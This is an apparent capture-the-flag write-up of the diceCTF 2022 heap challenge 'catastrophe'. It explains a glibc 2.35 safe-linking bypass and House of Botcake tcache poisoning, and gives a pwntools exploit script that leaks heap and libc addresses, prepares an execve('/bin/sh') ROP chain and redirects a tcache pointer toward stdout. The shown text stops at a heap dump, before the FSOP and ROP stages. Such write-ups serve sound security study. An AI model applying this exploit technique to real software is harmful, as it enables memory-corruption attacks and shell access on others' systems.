<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="true" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  <title>[diceCTF 2022 - pwn] catastrophe | repr</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="Introduction I just learned how to use malloc and free… am I doing this right?  catastrophe is a heap challenge I did during the diceCTF 2022. I did have a lot of issues with the libc and the dynamic">
<meta property="og:type" content="article">
<meta property="og:title" content="[diceCTF 2022 - pwn] catastrophe">
<meta property="og:url" content="https://n4sm.github.io/posts/catastrophe/index.html">
<meta property="og:site_name" content="repr">
<meta property="og:description" content="Introduction I just learned how to use malloc and free… am I doing this right?  catastrophe is a heap challenge I did during the diceCTF 2022. I did have a lot of issues with the libc and the dynamic">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-07-28T00:00:00.000Z">
<meta property="article:modified_time" content="2023-08-01T09:42:00.719Z">
<meta property="article:author" content="nasm">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="nasm">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="ret2school">
<meta property="article:tag" content="diceCTF">
<meta property="article:tag" content="aaSSfxxx">
<meta property="article:tag" content="2022">
<meta property="article:tag" content="FSOP">
<meta property="article:tag" content="heap">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="repr" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/pic/wall.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>repr </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="Search" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <image src=https://cdn.discordapp.com/attachments/755522926819934349/1135933820852502589/chtholly_nota_seniorious_by_asukaln_dfhx63b-414w-2x.jpg></image>
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">nasm </div>
      <div class="dot"></div>
      <div class="subtitle">pwn / kernel stuff </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com/nasm_re" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com/n4sm" title="GitHub"><i class="fa-brands fa-github"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://ret2school.github.io/discord" title="Discord"><i class="fa-brands fa-discord"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      


  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Categories</h3>
      <div class="category-box">
            <a class="category-link" href="/categories/pwn/">
                pwn
                <div class="category-count">2</div>
            </a>
        </div>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Recent Posts</h3>
      <ul>
        
          <a class="recent-link" href="/posts/iwindow/" title="[ImaginaryCTF 2023 - pwn] window-of-opportunity" >
            <div class="recent-link-text">
              [ImaginaryCTF 2023 - pwn] window-of-opportunity
            </div>
          </a>
        
          <a class="recent-link" href="/posts/mailman/" title="[ImaginaryCTF 2023 - pwn] mailman" >
            <div class="recent-link-text">
              [ImaginaryCTF 2023 - pwn] mailman
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-catastrophe" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        [diceCTF 2022 - pwn] catastrophe
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2022-07-28T00:00:00.000Z" itemprop="datePublished">2022-07-28</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
  <a class="meta-cate-link" href="/categories/pwn/">pwn</a>
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            3.8k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/2022/" rel="tag">2022</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/FSOP/" rel="tag">FSOP</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/aaSSfxxx/" rel="tag">aaSSfxxx</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/diceCTF/" rel="tag">diceCTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/heap/" rel="tag">heap</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/nasm/" rel="tag">nasm</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ret2school/" rel="tag">ret2school</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <h1 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h1><blockquote>
<p>I just learned how to use malloc and free… am I doing this right?</p>
</blockquote>
<p>catastrophe is a heap challenge I did during the diceCTF 2022. I did have a lot of issues with the libc and the dynamic linker, thus I did a first time the challenge with the libc that was in <code>/lib/libc.so.6</code>, then I figured out thanks to my teammate <a href="../../tags/supersnail">supersnail</a> that I was using the wrong libc. Then I did it again with the right libc but the dynamic linker was (again) wrong and I lost a loot of time on it. So well, the challenge wasn’t pretty hard but I took a funny way to solve it because I thought the libc had <code>FULL RELRO</code> while  it had only <code>PARTIAL RELRO</code>. Find the exploit and the tasks <a target="_blank" rel="noopener" href="https://github.com/ret2school/ctf/tree/master/2022/diceCTF/pwn/catastrophe">right here</a>.</p>
<h1 id="TL-DR"><a href="#TL-DR" class="headerlink" title="TL; DR"></a>TL; DR</h1><ul>
<li>Leak heap address + defeating safe linking by printing the first free’d chunk in the tcache.</li>
<li><a target="_blank" rel="noopener" href="https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_botcake.c">House of botcake</a> to create overlapping chunks and get arbitrary write</li>
<li>FSOP on stdout to leak <code>environ</code> and then ROP over the stack.</li>
</ul>
<h1 id="What-we-have"><a href="#What-we-have" class="headerlink" title="What we have"></a>What we have</h1><p>catastrophe is a classic heap challenge here are the classic informations about it:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">$ ./libc.so.6 </span><br><span class="line">GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3) stable release version 2.35.</span><br><span class="line">Copyright (C) 2022 Free Software Foundation, Inc.</span><br><span class="line">This is free software; see the source for copying conditions.</span><br><span class="line">There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A</span><br><span class="line">PARTICULAR PURPOSE.</span><br><span class="line">Compiled by GNU CC version 11.2.0.</span><br><span class="line">libc ABIs: UNIQUE IFUNC ABSOLUTE</span><br><span class="line">For bug reporting instructions, please see:</span><br><span class="line">&lt;https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs&gt;.</span><br><span class="line">$ checksec --file libc.so.6 </span><br><span class="line">[*] &#x27;/home/nasm/Documents/ctf/2022/diceCTF/pwn/catastrophe/libc.so.6&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      PIE enabled</span><br><span class="line">$ checksec --file catastrophe </span><br><span class="line">[*] &#x27;/home/nasm/Documents/ctf/2022/diceCTF/pwn/catastrophe/catastrophe&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Full RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      PIE enabled</span><br></pre></td></tr></table></figure>

<p><code>2.35</code> libc, which means there is no more classic hooks like <code>__malloc_hook</code> or <code>__free_hook</code>. The binary allows to:</p>
<ul>
<li>malloc up to 0x200 bytes and read data in it with the use of <code>fgets</code></li>
<li>Allocate from the index 0 to 9</li>
<li>free anything given the index is between 0 and 9</li>
</ul>
<p>Thus we can easily do a <a target="_blank" rel="noopener" href="https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_botcake.c">House of botcake</a> but first of all we have to defeat the safe linking to properly getting an arbitrary write.</p>
<h1 id="Defeat-safe-linking"><a href="#Defeat-safe-linking" class="headerlink" title="Defeat safe-linking"></a>Defeat safe-linking</h1><p>Since <code>2.32</code> is introduced in the libc the safe-linking mechanism that does some xor encyptions on <code>tcache</code>, <code>fastbin</code> next fp to prevent pointer hiijacking. Here is the core of the mechanism:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// https://elixir.bootlin.com/glibc/latest/source/malloc/malloc.c#L340</span></span><br><span class="line"><span class="comment">/* Safe-Linking:</span></span><br><span class="line"><span class="comment">   Use randomness from ASLR (mmap_base) to protect single-linked lists</span></span><br><span class="line"><span class="comment">   of Fast-Bins and TCache.  That is, mask the &quot;next&quot; pointers of the</span></span><br><span class="line"><span class="comment">   lists&#x27; chunks, and also perform allocation alignment checks on them.</span></span><br><span class="line"><span class="comment">   This mechanism reduces the risk of pointer hijacking, as was done with</span></span><br><span class="line"><span class="comment">   Safe-Unlinking in the double-linked lists of Small-Bins.</span></span><br><span class="line"><span class="comment">   It assumes a minimum page size of 4096 bytes (12 bits).  Systems with</span></span><br><span class="line"><span class="comment">   larger pages provide less entropy, although the pointer mangling</span></span><br><span class="line"><span class="comment">   still works.  */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PROTECT_PTR(pos, ptr) \</span></span><br><span class="line"><span class="meta">  ((__typeof (ptr)) ((((size_t) pos) &gt;&gt; 12) ^ ((size_t) ptr)))</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> REVEAL_PTR(ptr)  PROTECT_PTR (&amp;ptr, ptr)</span></span><br></pre></td></tr></table></figure>

<p>Since for this challenge we’re focused on <code>tcache</code>, here is how a chunk is free’d using safe-linking:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// https://elixir.bootlin.com/glibc/latest/source/malloc/malloc.c#L3175</span></span><br><span class="line"><span class="comment">/* Caller must ensure that we know tc_idx is valid and there&#x27;s room</span></span><br><span class="line"><span class="comment">   for more chunks.  */</span></span><br><span class="line"><span class="type">static</span> __always_inline <span class="type">void</span></span><br><span class="line"><span class="title function_">tcache_put</span> <span class="params">(mchunkptr chunk, <span class="type">size_t</span> tc_idx)</span></span><br><span class="line">&#123;</span><br><span class="line">  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Mark this chunk as &quot;in the tcache&quot; so the test in _int_free will</span></span><br><span class="line"><span class="comment">     detect a double free.  */</span></span><br><span class="line">  e-&gt;key = tcache_key;</span><br><span class="line"></span><br><span class="line">  e-&gt;next = PROTECT_PTR (&amp;e-&gt;next, tcache-&gt;entries[tc_idx]);</span><br><span class="line">  tcache-&gt;entries[tc_idx] = e;</span><br><span class="line">  ++(tcache-&gt;counts[tc_idx]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Thus, the first time a chunk is inserted into a tcache list, <code>e-&gt;next</code> is initialized to <code>&amp;e-&gt;next &gt;&gt; 12</code> (heap base address) xor <code>tcache-&gt;entries[tc_idx]</code> which is equal to zero when the list for a given size is empty.</p>
<p>Which means to leak the heap address we simply have to print a free’d chunk once it has been inserted in the tcache.</p>
<h1 id="House-of-botcake"><a href="#House-of-botcake" class="headerlink" title="House of botcake"></a>House of botcake</h1><p>The <a target="_blank" rel="noopener" href="https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_botcake.c">House of botcake</a> gives a write what where primitive by poisoning the tcache. The algorithm is:</p>
<ul>
<li>Allocate 7 <code>0x100</code> sized chunks to then fill the tcache (7 entries).</li>
<li>Allocate two more <code>0x100</code> sized chunks (<code>prev</code> and <code>a</code> in the example).</li>
<li>Allocate a small “barrier” <code>0x10</code> sized chunk.</li>
<li>Fill the tcache by freeing the first 7 chunks.</li>
<li>free(a), thus <code>a</code> falls into the unsortedbin.</li>
<li>free(prev), thus <code>prev</code> is consolidated with <code>a</code> to create a large <code>0x221</code> sized chunk that is yet in the unsortedbin.</li>
<li>Request one more <code>0x100</code> sized chunk to let a single entry left in the tcache.</li>
<li>free(a) again, given <code>a</code> is part of the large <code>0x221</code> sized chunk it leads to an UAF. Thus <code>a</code> falls into the tcache.</li>
<li>That’s finished, to get a write what where we just need to request a <code>0x130</code> sized chunk. Thus we can hiijack the next fp of <code>a</code> that is currently referenced by the tcache by the location we wanna write to. And next time two <code>0x100</code> sized chunks are requested, the second one will be the target location.</li>
</ul>
<h1 id="Getting-arbitrary-write"><a href="#Getting-arbitrary-write" class="headerlink" title="Getting arbitrary write"></a>Getting arbitrary write</h1><p>To make use of the write what were we got thanks to the <a target="_blank" rel="noopener" href="https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_botcake.c">House of botcake</a>, we need to get both heap and libc leak. To leak libc that’s pretty easily we just need to print out a free’d chunk stored into the unsortedbin, it’s forward pointer is not encrypted with safe-linking.</p>
<p>As seen previously, to bypass safe-linking we have to print a free’d chunk once it has been inserted in the tcache. It would give us the base address of the heap. When we got it, we just have to initialize the location we wanna write to <code>location ^ ((heap_base + chunk_offset) &gt;&gt; 12)</code> to encrypt properly the pointer, this way the primitive is efficient.</p>
<p>Implmentation of the <a target="_blank" rel="noopener" href="https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_botcake.c">House of botcake</a> + safe-linking bypass, heap and libc leak:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">io = start()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">alloc</span>(<span class="params">idx, data, size</span>):</span><br><span class="line">   io.sendlineafter(<span class="string">&quot;-\n&gt; &quot;</span>, <span class="string">b&quot;1&quot;</span>) </span><br><span class="line">   io.sendlineafter(<span class="string">&quot;Index?\n&gt; &quot;</span>, <span class="built_in">str</span>(idx).encode()) </span><br><span class="line">   io.sendlineafter(<span class="string">&quot;&gt; &quot;</span>, <span class="built_in">str</span>(size).encode()) </span><br><span class="line">   io.sendlineafter(<span class="string">&quot;: &quot;</span>, data) </span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">free</span>(<span class="params">idx</span>):</span><br><span class="line">   io.sendlineafter(<span class="string">&quot;&gt; &quot;</span>, <span class="string">b&quot;2&quot;</span>) </span><br><span class="line">   io.sendlineafter(<span class="string">&quot;&gt; &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">view</span>(<span class="params">idx</span>):</span><br><span class="line">   io.sendlineafter(<span class="string">&quot;&gt; &quot;</span>, <span class="string">b&quot;3&quot;</span>) </span><br><span class="line">   io.sendlineafter(<span class="string">&quot;&gt; &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    alloc(i, <span class="string">b&quot;&quot;</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">view(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">heap = ((pwn.u64(io.recvline()[:-<span class="number">1</span>].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>)) &lt;&lt; <span class="number">12</span>))</span><br><span class="line">pwn.log.info(<span class="string">f&quot;heap @ <span class="subst">&#123;<span class="built_in">hex</span>(heap)&#125;</span>&quot;</span>)</span><br><span class="line"><span class="comment"># then we defeated safe linking lol</span></span><br><span class="line"></span><br><span class="line">alloc(<span class="number">0</span>, <span class="string">b&quot;YY&quot;</span>, <span class="number">0x100</span>)</span><br><span class="line"><span class="comment"># request back the chunk we used to leak the heap</span></span><br><span class="line"></span><br><span class="line">alloc(<span class="number">7</span>, <span class="string">b&quot;YY&quot;</span>, <span class="number">0x100</span>) <span class="comment"># prev</span></span><br><span class="line">alloc(<span class="number">8</span>, <span class="string">b&quot;YY&quot;</span>, <span class="number">0x100</span>) <span class="comment"># a</span></span><br><span class="line"></span><br><span class="line">alloc(<span class="number">9</span>, <span class="string">b&quot;/bin/sh\0&quot;</span>, <span class="number">0x10</span>) <span class="comment"># barrier</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># fill tcache</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    free(i)</span><br><span class="line"></span><br><span class="line">free(<span class="number">8</span>) <span class="comment"># free(a) =&gt; unsortedbin</span></span><br><span class="line">free(<span class="number">7</span>) <span class="comment"># free(prev) =&gt; merged with a</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># leak libc</span></span><br><span class="line">view(<span class="number">8</span>)</span><br><span class="line"></span><br><span class="line">libc = pwn.u64(io.recvline()[:-<span class="number">1</span>].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>)) - <span class="number">0x219ce0</span> <span class="comment"># - 0x1bebe0 # offset of the unsorted bin</span></span><br><span class="line"></span><br><span class="line">rop = pwn.ROP(libc)</span><br><span class="line">binsh = <span class="built_in">next</span>(libc.search(<span class="string">b&quot;/bin/sh\x00&quot;</span>))</span><br><span class="line">rop.execve(binsh, <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">environ = libc.address + <span class="number">0x221200</span></span><br><span class="line">stdout = libc.address + <span class="number">0x21a780</span></span><br><span class="line"></span><br><span class="line">pwn.log.info(<span class="string">f&quot;libc: <span class="subst">&#123;<span class="built_in">hex</span>(libc)&#125;</span>&quot;</span>)</span><br><span class="line">pwn.log.info(<span class="string">f&quot;environ: <span class="subst">&#123;<span class="built_in">hex</span>(environ)&#125;</span>&quot;</span>)</span><br><span class="line">pwn.log.info(<span class="string">f&quot;stdout: <span class="subst">&#123;<span class="built_in">hex</span>(stdout)&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">0</span>, <span class="string">b&quot;YY&quot;</span>, <span class="number">0x100</span>) <span class="comment"># pop a chunk from the tcache to let an entry left to a </span></span><br><span class="line">free(<span class="number">8</span>) <span class="comment"># free(a) =&gt; tcache</span></span><br><span class="line"></span><br><span class="line">alloc(<span class="number">1</span>, <span class="string">b&quot;T&quot;</span>*<span class="number">0x108</span> + pwn.p64(<span class="number">0x111</span>) + pwn.p64((stdout ^ ((heap + <span class="number">0xb20</span>) &gt;&gt; <span class="number">12</span>))), <span class="number">0x130</span>) </span><br><span class="line"><span class="comment"># 0x130, too big for tcache =&gt; unsortedbin UAF on a to replace a-&gt;next with the address of the target location (stdout) </span></span><br><span class="line">alloc(<span class="number">2</span>, <span class="string">b&quot;TT&quot;</span>, <span class="number">0x100</span>)</span><br><span class="line"><span class="comment"># pop a from tcache</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># next 0x100 request will return the target location (stdout)</span></span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">0x55c4fbcd7a00:	0x0000000000000000	0x0000000000000141 [prev]</span></span><br><span class="line"><span class="string">0x55c4fbcd7a10:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7a20:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7a30:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7a40:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7a50:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7a60:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7a70:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7a80:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7a90:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7aa0:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7ab0:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7ac0:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7ad0:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7ae0:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7af0:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7b00:	0x5454545454545454	0x5454545454545454</span></span><br><span class="line"><span class="string">0x55c4fbcd7b10:	0x5454545454545454	0x0000000000000111 [a]</span></span><br><span class="line"><span class="string">0x55c4fbcd7b20:	0x00007f5d45ff5b57	0x4f60331b73b9000a</span></span><br><span class="line"><span class="string">0x55c4fbcd7b30:	0x0000000000000000	0x0000000000000000</span></span><br><span class="line"><span class="string">0x55c4fbcd7b40:	0x0000000000000000	0x00000000000000e1 [unsortedbin]</span></span><br><span class="line"><span class="string">0x55c4fbcd7b50:	0x00007f5819b0dce0	0x00007f5819b0dce0</span></span><br><span class="line"><span class="string">0x55c4fbcd7b60:	0x0000000000000000	0x0000000000000000</span></span><br><span class="line"><span class="string">0x55c4fbcd7b70:	0x0000000000000000	0x0000000000000000</span></span><br><span class="line"><span class="string">0x55c4fbcd7b80:	0x0000000000000000	0x0000000000000000</span></span><br><span class="line"><span class="string">0x55c4fbcd7b90:	0x0000000000000000	0x0000000000000000</span></span><br><span class="line"><span class="string">0x55c4fbcd7ba0:	0x0000000000000000	0x0000000000000000</span></span><br><span class="line"><span class="string">0x55c4fbcd7bb0:	0x0000000000000000	0x0000000000000000</span></span><br><span class="line"><span class="string">0x55c4fbcd7bc0:	0x0000000000000000	0x0000000000000000</span></span><br><span class="line"><span class="string">0x55c4fbcd7bd0:	0x0000000000000000	0x0000000000000000</span></span><br><span class="line"><span class="string">0x55c4fbcd7be0:	0x0000000000000000	0x0000000000000000</span></span><br><span class="line"><span class="string">0x55c4fbcd7bf0:	0x0000000000000000	0x0000000000000000</span></span><br><span class="line"><span class="string">0x55c4fbcd7c00:	0x0000000000000000	0x0000000000000000</span></span><br><span class="line"><span class="string">0x55c4fbcd7c10:	0x0000000000000000	0x0000000000000000</span></span><br><span class="line"><span class="string">0x55c4fbcd7c20:	0x00000000000000e0	0x0000000000000020</span></span><br><span class="line"><span class="string">0x55c4fbcd7c30:	0x0068732f6e69622f	0x000000000000000a</span></span><br><span class="line"><span class="string">0x55c4fbcd7c40:	0x0000000000000000	0x00000000000203c1 [top chunk]</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br></pre></td></tr></table></figure>

